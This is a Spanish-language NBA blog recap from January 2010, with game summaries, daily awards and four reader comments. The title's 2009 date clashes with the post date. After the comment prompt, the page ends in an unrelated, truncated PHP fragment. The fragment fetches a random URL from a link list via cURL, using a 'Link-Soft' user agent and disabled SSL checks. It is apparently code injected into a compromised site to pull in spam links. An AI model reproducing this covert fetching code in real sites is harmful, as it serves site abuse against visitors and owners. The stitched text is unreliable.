La Crónica (13/01/2009)

14 de January de 2010 por txusma

Jornada intensa, de finales dramáticos y mucha emoción.

La noticia no es que Kobe anote para ganar. La noticia es que un equipo dirigido por un ilustre “defensivo” como Carlisle le pusiera marcaje individual en un momento tan crítico. No parecía tan mala idea en un partido donde apenas había logrado alcanzar el aro con sus tiros, terriblemente debilitado por su lumbalgia pero a estas alturas todos deberíamos tener claro que “La Mamba” no está hecho de la misma pasta que el resto de los mortales. Aún tuvo fuerzas después para llegar a hacer falta a un Dampier solo debajo del aro. Sus dos fallos posteriores también son mérito de Kobe. La fortuna hay que buscarla. Sin Pau y con el 10% de Kobe en pista, parecía que los Lakers nos habían oido rajar de ellos. Bynum sobresaliente, Odom hiper-participativo, Artest y Farmar fundamentales. Primera franquicia que alcanza la cifra de 3.000 victorias, estropeando el día a Nowitzki, el primer europeo que llega a los 20.000 puntos.

Tocaba épica también a los Spurs. Duncan descansaba ayer y no parecía la mejor ocasión en la visita a Oklahoma City. Sin embargo era la noche de DeJuan Blair, muy bien respaldado por Parker y McDyess. Hizo falta prórroga para doblegar a los Thunder. Curioso que Westbrook se jugara las dos decisivas. Una la metió para empatar en el reglamentario y la otra la falló para ganar el partido. Es un jugador capacitado para ello, pero Durant está en estado de gracia.

Hasta 3 prórrogas hubo en Houston, donde los Wolves se les subieron a las barbas. Brooks se tiró el equipo a la espalda y amarró otra importantísima victoria más para los Rockets. No podemos decir lo mismo de Phoenix, que se dejó remontar 24 puntos en Indianápolis. Por su parte, los Nuggets jugaron de cine para tumbar a Orlando y Portland ganó a Milwaukee en el regreso de Rudy.

Los Clippers también jugaron ayer pero seguro que la derrota que cosecharon frente a New Orleans es la menor de las preocupaciones después de saber que la elección número 1 del pasado draft, Blake Griffin, se pierde el resto de la temporada para ver si consiguen solucionar de una vez los problemas que padece en la rodilla. Una verdadera lástima para Griffin y para los Clippers.

Terminando, los Hawks ganaron a los Wizards, los Celtics a los Nets, los Heat a los Warriors y los Knicks de 1 a los Sixers, con canastita decisiva de Lee en los últimos segundos. ¿All Star sí o no?

PREMIOS

MVP: Varios candidatos para el premio. Por un lado la pareja Danny Granger – Mike Dunleavy que lideró a los Pacers a la victoria frente a los Suns con 63 puntos entre ambos. Por otro lado, Aaron Brooks que aprovechando las 3 prórrogas de su partido se fue a los 43 puntos, y finalmente Dwyane Wade con 35 puntos, 7 rebotes y 9 asistencias. Lástima de sus 7 pérdidas. Cerquita de cuádruple-doble.

Rookie: Sin ninguna duda el rookie del día es DaJuan Blair, que en ausencia de Tim Duncan anotó 28 puntos y recogió 21 rebotes, 10 de ellos ofensivos. Una auténtica bestia parda. Lejos queda el partido de Wayne Ellington (17 puntos), pero ya que no nos tiene muy acostumbrados merece, al menos, que lo nombremos. Jodie Meeks con 21 puntos también cuajó un partido interesante.

Sorpresa: Randy Foye continúa aprovechando el vacio que ha dejado Gilbert Arenas en los Wizards. Ayer anotó 18 puntos y repartió 8 asistencias y en los últimos 5 partidos promedia 19.8-6.8. Bueno tiempos para el de Villanova. Sorprende también el partidzao de Matt Barnes, que se convirtió en el más destacado de su equipo cn 28 puntos y 9 rebotes.

Decepción: El día después de anotar 30 puntos e intentar 15 tiros, Dwight Howard se queda en 8 puntos en 7 tiros.  Esta temporada no acaba de encontrar la regularidad a la que nos tenía acostumbrados.

Esfuerzo en vano: 26 puntos y 26 rebotes (récord de la temporada) consiguió Al Jefferson. Luchó durante 3 prórrogas pero finalmente se le escapó la victoria entre los dedos. Otro que no pudo celebrar completamente su buena actuación fue Dirk Nowitzki que vio como los Lakers le amargaron si gran noche. 30 puntos, 16 rebotes y el 34º jugador que llega a los 20.000 puntos.

Comenta

4 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Nowitzki futuro y merecidísimo Hall of Fame. Gracias Robin Hood por jugar tan bien a esto.
    Lo de Bryant está muy, muy próximo a Jordan, aunque en nuestras mentes haya un muro que se resigne a pensar que algún día va a haber alguie como él.
    Sería muy interesante analizar las elecciones de los Spurs en los últimos diez años.
    Creo que es el equipo que mejor ha escogido en el draft sin tener elecciones altas. Parker, Ginobili, Scola, Dajuan Blair…

    Txusma, el puesto de cinco reserva en el equipo del este debería quedar desierto. No hay ningún jugador que esté haciendo una temporada digna de ser All Star.

    Un saludo,
    Pablo

      Citar

  2. Love Denise dice:
    #2

    muy bueno el dato de primera franquicia en llegar a 3000 victorias y primer europeo en 20000 puntos.
    Con esta intensidad es con la que deberian jugar siempre Odom, Bynum y Artest, hoy Bynum sí ha jugado de cine, pero contra los Spurs fue un desastre, de esta forma son invencibles a 7 partidos, pero me temo que en mas de un partido volveremos a ver el pasotismo de estos 3. Si Bryant tiene fuertes dolores de espalda, me parecería mejor que no jugase hasta que se recuperase totalmente, pero en fin, ellos sabran..

    Van Gundy Dimision ya¡¡¡¡, y que conste que hasta este año me parecia un gran coach, a Lewis hay que leerle la cartilla, y no se que coj.. hace Redick jugandose 30 minutos con esa pésima defensa, teniendo a Pietrus y Bass. Redick es el tipico blanquito debil tirador que solo debe jugar cuando tiene el día bueno en el triple, cuando esta fallón, debe estar en el banquillo, pues no aporta nada más al equipo como si pueden aporta los mencionados Pietrus y Bass.

    Una pena lo de griffin, y enormes actuaciones de Brooks y Blair, que demuestran lo mal que a veces se elige en el draft. Que partidazo tambien el de los wolves, con un enorme Jefferson, jugador un poco infravalorado mediaticamente por estar en un equipo pqueño.

      Citar

  3. Txusma dice:
    #3

    Ya lo comente en aquel post de hace unos días pero cuesta creer que unos promedios de 19 puntos y 10.9 en un equipo que está en la pomada de la lucha por los Playoffs del Este no se merezca el All Stars.
    Comparativamente Howard está en 17-13.2 y en el Oeste, Amare será titular con 21-8.7 y creo que nadie le discute el puesto…

      Citar

  4. jonatan dice:
    #4

    Y hay que contar con que NY se lo pensó 3 o 4 veces antes de renovarle este verano…..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>